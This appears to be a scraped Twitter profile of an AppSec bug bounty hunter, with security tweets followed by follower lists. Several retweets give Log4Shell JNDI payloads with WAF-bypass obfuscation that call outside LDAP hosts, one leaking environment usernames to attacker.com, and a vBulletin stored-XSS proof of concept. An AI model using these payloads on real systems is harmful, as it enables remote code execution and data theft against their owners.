Ahmed Mehtab @ahmedmehtabpk
AppSec engineer @afiniti / Into Bug Bounty Hunting & InfoSec #speaker #cybersecurity #penetrationtester Joined October 2013-
Tweets492
-
Followers199
-
Following266
-
Likes487
It's only been 2 hours since Open AI launched GPT-4o, and people are going crazy over it. Here are 10 wild examples you don't want to miss: 1. Math Problems with GPT-4o
This year has been really great to me, ranked 4th in @Sophos so far. #bugcrowd #BugBounty #sophos
If you want to master API security, open this thread! APIs are used EVERYWHERE for applications to communicate, but let's see how you can HACK them! 👩💻 A Thread 🧵👇
Ranked 8th in @Sophos hof #sophos #BugBounty #bugcrowd
Pretty neat phishing technique I haven't received before. Attackers filled out a Google Form with my email and abused the "Send me a copy of my response" feature.
Ben @NahamSec does an awesome writeup of how leaked credentials make it to public repos and how to find them as a bounty hunter with the new TruffleHog release! Complete with an interview of @InsecureNature on the new engine! youtube.com/watch?v=gkKLV-…
A researcher warns of a new "browser-in-the-browser" (BITB) technique that could allow attackers to spoof a legitimate domain to launch nearly undetectable #phishing attacks and steal credentials. Read details: thehackernews.com/2022/03/new-br… #infosec #cybersecurity #technews
$7500 payout this week between 3 vulns! #bugbountytips I’ve been recently enjoying content discovery and appending unusual characters at the end of the file name to mess around with the parser logic, my typical winners are appending a “;” or “/“ at the end of a file name
Today we're publishing a detailed technical writeup of FORCEDENTRY, the zero-click iMessage exploit linked by Citizen Lab to the exploitation of journalists, activists and dissidents around the world. googleprojectzero.blogspot.com/2021/12/a-deep…
Just bypassed AWS WAF for log4j jndi injection: ${j${k8s:k5:-ND}i${sd:k5:-:}ldap://mydogsbutt.com:1389/o} Anyone who care to share Akamai Bypass? #bugbountytips
Since the final fix for the #log4j RCE vulnerability is out — I'm finally open-sourcing a scanning toolkit for CVE-2021-44228 that I developed over the weekend. Features include automatic Canary Tokens generation, request customization and many others. :) github.com/0xInfection/Lo…
You can use a point & click canarytoken from canarytokens.org to help test for the #log4j / #Log4Shell issue. 1) visit canarytokens.org; 2) choose the Log4shell token; 3) enter the email address you wish to be notified at; 4) copy/use the returned string...
Found a bypass working for a few WAF ${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a} Enjoy bounty season with #log4j #Log4Shell #log4jRCE #bugbountytip
I see people reporting Tesla and Apple vulnerable based on DNS queries. These could be done by any device in the path (i.e. a WAF, IPS, SIEM). Hint: use a name that will confirm resolution worked such as this: ${jndi:ldap://${env:USER}.${env:USERNAME}.attacker.com:1389/
How to test your apps for #log4shell vulnerability 1. Generate a DNS token canarytokens.org/generate# 2. Wrap that token in Prefix: ${jndi:ldap:// Suffix: /a} 3. Use that value in search forms, profile data, settings etc. of your apps 4. Get notified when you triggered a reaction
🔥 The persistent XSS in any message in vBulletin! Patched from 13 Apr 2021. The vulnerability was found by our researcher @Psych0tr1a. PoC: [VIDEO="aaa;000"]a[FONT="a onmouseover=alert(location) a"]a[/FONT]a[/VIDEO] Advisory: vbulletin.org/forum/showthre…
@BountyOverflow this is one of tricks to bypass 403
Testing an e-commerce checkout? Try a test credit card number like "4242 4242 4242 4242" on a production site. Test responsibly & report it if it works 🙋🏽♂️ 🙋🏽♀️ More details on testing card numbers for Stripe integrations 💳👇 stripe.com/docs/testing #BugBountyTips
Thithurth @ThithurthtVwA1
18 Followers 1K Following
Omar Ahmed @omarahmad1590
44 Followers 673 Following لا أؤمن بالصدفة ،كنت دائماً أري اللَّه في كل شئ.
Usman Baloch @markhor_stock
19 Followers 306 Following
Awais Akhtar @AwaisAk06616677
5 Followers 23 Following
Fallen Apple 🍎 @fallenapplle
49 Followers 176 Following
jatan vora @VoraJatan1
212 Followers 581 Following Application Security Engineer | Penetration tester ! bugbounty hunter
Hack_Warrior @usmankh93847456
3 Followers 133 Following
Muhammad Tariq @M_Tariq23
12 Followers 37 Following Cyber Security Enthusiast #Incidentresponse #IOT #Businessintelligence #Regulatorycompliance #ICTpolicyframework
Jawad Saqib @jawadsaqib_
246 Followers 1K Following PNPT | CEH | Cyber Security enthusiast, Pentester, Web Developer, Python + Bash ❤️ Author at https://t.co/pVa55H5BHZ
deena dhayalan j @deena_dhayalan_
214 Followers 1K Following Bug Bounty Hunter | @bugcrowd | CTF player | CAP certified AppSec practitioner | Student
|)Opp3l6äng3r @d0pp3l6ang3r
126 Followers 814 Following Needless to say, views are my own! RT or like - not endorsement!
Ron Culler @ronculler
418 Followers 821 Following Technology Architect, MSS Visionary, Security Evangelist and Head Geek Speaker on Internet Security Trends. Opinions are my own
Dave Gerry @davegerryjr
2K Followers 3K Following #girldad x2. CEO @bugcrowd. Former WhiteHat Security, Sumo Logic & Veracode. Tweets are my own.
Joe Levy @chiesennegs
1K Followers 5K Following First, do no harm. Then protect. Then fail with grace. CEO @sophos @[email protected]
Brenda Miller @BrendaM68649506
749 Followers 5K Following Achieve your certification dreams with us! 100% pass guarantee
:) @pwnsauc3
2K Followers 1K Following
Thinkst Canary @ThinkstCanary
13K Followers 10K Following Most companies only realise they are breached when informed by a 3rd party. This is a stupid problem! Thinkst Canary. Know. When it Matters.
Bigidiot @abcddcb13286422
499 Followers 943 Following https://t.co/VNAH0SZkQD https://t.co/HJxliYXrXH
Nordic Defender @nordicdefender
1K Followers 843 Following Nordic's Only Crowd-Powered Next Generation MSSP,
Shawar Khan @ShawarkOFFICIAL
6K Followers 847 Following Just a guy who breaks into web like a .357 bullet | Security Engineer at MyAlfred | @synackredteam | Synack Acropolis | Acknowledged by Top Tech Giants.
Jim Manico from Manic... @manicode
17K Followers 6K Following AppSec Educator https://t.co/wTGnDb91Pp #React
Dr Mohsin Baloch ❤�... @MohsinKhanHM1
135 Followers 346 Following We are only as strong as we are united, as weak as we are divided. #SaveBalochistan #SaveHumanity Humanity is Above All & (RT’s are not endorsements)
SAAD AHMAD @Saad924622
8 Followers 60 Following
Nilce Pereira @Benjami44573610
12 Followers 165 Following 🔺 𝑷𝑹𝑶𝑭𝑬𝑺𝑺𝑰𝑶𝑵𝑨𝑳 𝑭𝑶𝑹𝑬𝑿/𝑪𝑹𝒀𝑷𝑻𝑶 𝑻𝑹𝑨𝑫𝑬𝑹 🎓 🔻𝑴𝑬𝑵𝑻𝑶𝑹 🗺️85-90%𝑾𝒊𝒏𝒏𝒊𝒏𝒈 𝒓𝒂𝒕𝒆 💻24/5 𝑻𝒓𝒂𝒅𝒊𝒏𝒈 🌐 🔺𝑵𝑬𝑻𝑾𝑶𝑹𝑲
lokker @LokkerPrivacy
54 Followers 679 Following Lokker offers web privacy solutions that protect brands and their customers by enabling client-side control over 3rd-party scripts.
Felipe Colsani @fcolsani
32 Followers 452 Following
Alibaba Security Resp... @AsrcSecurity
4K Followers 3K Following Alibaba Security Response Center (ASRC), Point of Contact of all the Alibaba related vulnerabilities, cooperations, and so on.
Ali Mehar @AliMeha18286795
18 Followers 106 Following Don't mix personality and my attitude because my parsonality is me and my attitude depends on you.
AEMSecurity @AEMSecurity
10K Followers 2K Following Husband + Father | Penetration Tester / Hacker | Interested in Security - Bugbounty - Vulnerability/Exploit Research CVE-2016-0956, CVE-2013-6674, CVE-2014-2018
Ali Yar Khan @Mr_Programmer14
2K Followers 2K Following Freelance Full stack web & mobile developer | MERN stack | React Native | Flutter | React | Nextjs | Nodejs | Appwrite | Firebase
Nkamwa marcel (Uncle ... @nkamwa_marcel
210 Followers 2K Following Leftie | CyberSecurity Specialist | 2nd Prize Winner Tekonsult International Telecommunications Contest | Huawei Seeds For The Future Laureate | Go-Giver
Zohaiß Jav3d @zohaibjaved089
13 Followers 329 Following
It Zone @ItZone11
3 Followers 29 Following
ABdUrReHman @ABdUrKhaLiFa
5 Followers 74 Following
Baba ZeeArs 🎏 @zeeekhan26
79 Followers 795 Following
Polizei Karlsruhe @Polizei_KA
30K Followers 92 Following Offizielle Seite des Polizeipräsidiums Karlsruhe. Im Notfall 110 wählen! Keine Anzeigen auf X. https://t.co/b2XYaHpfm3
Morgan Brown @morganb
63K Followers 1K Following VP Product & Growth - AI @dropbox prev @instagram, @shopify. Views = my own. Author, "Hacking Growth". Married to @erikab. Proud Dad.
Jens Spahn @jensspahn
271K Followers 733 Following Mitglied des Deutschen Bundestags | Fraktionsvorsitzender @cducsubt | Präsidiumsmitglied @CDU | Westmünsterländer | Team Spahn (TS)
Richard Grenell @RichardGrenell
1.8M Followers 4K Following I’m stronger after cancer. my dog runs my life. imperfect follower of Christ. Tweets automatically delete after 30 days https://t.co/id5AM52MEZ
Fetch Pakistan @FetchPakistan
2K Followers 1 Following Follow Us On 'X' @FetchPakistan For The Latest In Education, Tech, Siasat, Sports, Property, Autos, Showbiz, Health & More. Stay Updated With Trending News!
HBL Currency Exchange @CurrencyHbl
10K Followers 2 Following HBL Currency Exchange 2nd Floor, 49-A, Block 6, PECHS, Shahrah-e-Faisal, Karachi Ph: (92) (21) 34324912 Email: [email protected] https://t.co/raUyhP7LmP
TeamYouTube @TeamYouTube
2.0M Followers 2K Following updates & answers from the team that brings you YouTube, helping in: english, español, português, deutsch, français, 日本語, indonesian, العربية, हिंदी, 한국어
/usr/bin/fares @SirBagoza
8K Followers 694 Following PartT bb hunter | Sec consultant | living my own life | YT@CyberBugz
Awais Akhtar @AwaisAk06616677
5 Followers 23 Following
Make it in Germany @MakeitinGermany
43K Followers 621 Following Make it in Germany - the German government’s portal for qualified professionals from around the world. Follow us on twitter for the latest updates.
Tristan Kalos @TristanKalos
521 Followers 1K Following Co-founder and CEO @ https://t.co/m0HwZH4ItB - Giving superpowers to product security engineers 🕸 · Hacker 👨💻 · memes dealer 🐱
Auswärtiges Amt @AuswaertigesAmt
908K Followers 1K Following Aktuelle Nachrichten aus dem Auswärtigen Amt - Auf Englisch: @GermanyDiplo - Impressum, Datenschutz & Netiquette: https://t.co/RMILLWXov8
Ina Lepel @GermanyinPAK
350K Followers 731 Following جرمن سفیر برائے پاکستان۔ German Ambassador to Pakistan
Eduardo Vela @sirdarckcat
12K Followers 602 Following not mad. mentally divergent. personal profile, opinions my own. everything I say is probably wrong. 🐘 @[email protected]
Imran Khan @ImranKhanPTI
21.3M Followers 0 Following Chairman Pakistan Tehreek-e-Insaf & former Prime Minister of Islamic Republic of Pakistan
Oscar🇩🇴 @CCNADailyTIPS
3K Followers 375 Following Sk5DSUEtSlVOT1MsIENDTkEgUiZTLCBTZWN1cml0eSwgYW5kIFBDTlNFIENlcnRpZmllZCEgT1NDUCBuZXh0IQ==
Raftar @raftardotcom
98K Followers 1 Following A Movement For Social Change. Latest from Raftar 🔗 Raftar TV: https://t.co/F4KnzSsGx6 Raftar Sports: https://t.co/zaUve3tVEI
Jorge Orchilles @jorgeorchilles
11K Followers 473 Following SANS Principal Instructor & Author #SEC565 | #RedTeam | #PurpleTeam | #PenTest | #C2Matrix Creator | ATT&CK & Atomic Red Team Contributor | Published Author
Santiago Lopez @santi_lopezz99
23K Followers 185 Following World's first $1M hacker | Top 3 @hacker0x01
SpaceX @SpaceX
40.0M Followers 120 Following SpaceX designs, manufactures and launches the world’s most advanced rockets and spacecraft
包养学生/北京�... @ef0redeath
188K Followers 17 Following 探星者包养平台欢迎您的加入,详情请点击官网。电报客服:https://t.co/3NSd3S11Sc 女生投稿应聘请添加V:tanxingzhe123 电报预览频道:https://t.co/GSR7M5dHbV 定制贴发布推:@tanxingzhe168 北京包养 包养
TESS @ArmanSameer95
7K Followers 933 Following Application Security Researcher https://t.co/g0QPLb24tI | https://t.co/XuUMBUWl0x | Most Valuable Hacker 2022 thanks to @bugcrowd | ex @pdiscoveryio
SBP @StateBank_Pak
507K Followers 15 Following This account is primarily for information dissemination. For any query, please write to us at: [email protected] or [email protected]
No Context Brits @NoContextBrits
1.8M Followers 0 Following A mordant celebration of British mediocrity according to the Washington Post. Contains sarcasm, irony and context.
Shayan Ali @ShayanA2307
721K Followers 20 Following Human Rights Activist. Law student. From the people. For the people.
Jon Erlichman @JonErlichman
431K Followers 100 Following Ticker Take Founder. https://t.co/7XgWGjQNWy Inquiries: [email protected]
Muhammad Tariq @M_Tariq23
12 Followers 37 Following Cyber Security Enthusiast #Incidentresponse #IOT #Businessintelligence #Regulatorycompliance #ICTpolicyframework
|)Opp3l6äng3r @d0pp3l6ang3r
126 Followers 814 Following Needless to say, views are my own! RT or like - not endorsement!
Mohand Israiwi @IsrewyMohand
1K Followers 496 Following Bug Hunter + Programmer https://t.co/J5DXDcucBU
Godfather Orwa 🇯�... @GodfatherOrwa
24K Followers 2K Following Hacker | Bug Hunter | Cooker | Top 5 P1 Warrior On https://t.co/dzFQH75OWj | LevelUpX Champion | 10+ 0Days/CVEs
OpenAI @OpenAI
4.3M Followers 3 Following OpenAI’s mission is to ensure that artificial general intelligence benefits all of humanity. We’re hiring: https://t.co/dJGr6Lg202
Tobi Weißhaar @_kun_19
1K Followers 77 Following MSc Advanced Computer Science | Pentester | OSCP | OSWE | CRTO | CRTP| Bug Bounty Hunter #kaeferjaeger
Tim Cook @tim_cook
14.9M Followers 70 Following Apple CEO Auburn 🏀 🏈 Duke 🏀 National Parks 🏞️ “Life's most persistent and urgent question is, 'What are you doing for others?'” - MLK. he/him
PTI Bahawalpur @PTIOfficialBWP
91K Followers 47 Following Official X Account of Pakistan Tehreek-e-Insaf Bahawalpur. #PTI
TechTarget News @TechTargetNews
33K Followers 1K Following Sharing the latest tech news, tips and in-depth insights, covering AI, cloud, cybersecurity, DevOps and more from the Editorial team at @InformaTTGT!
INE Security (FKA eLe... @INEsecurity
47K Followers 1K Following Revolutionizing the way the world gains #ITSecurity skills. Part of the @INE family
Huzaifa Habib @HouzaifKhan
2K Followers 310 Following Developer Relations, Community Manager @ Google | Ex: https://t.co/37YDacVeSa , UNDP | All opinions are mine
Dave Gerry @davegerryjr
2K Followers 3K Following #girldad x2. CEO @bugcrowd. Former WhiteHat Security, Sumo Logic & Veracode. Tweets are my own.Trends for United States
You might like
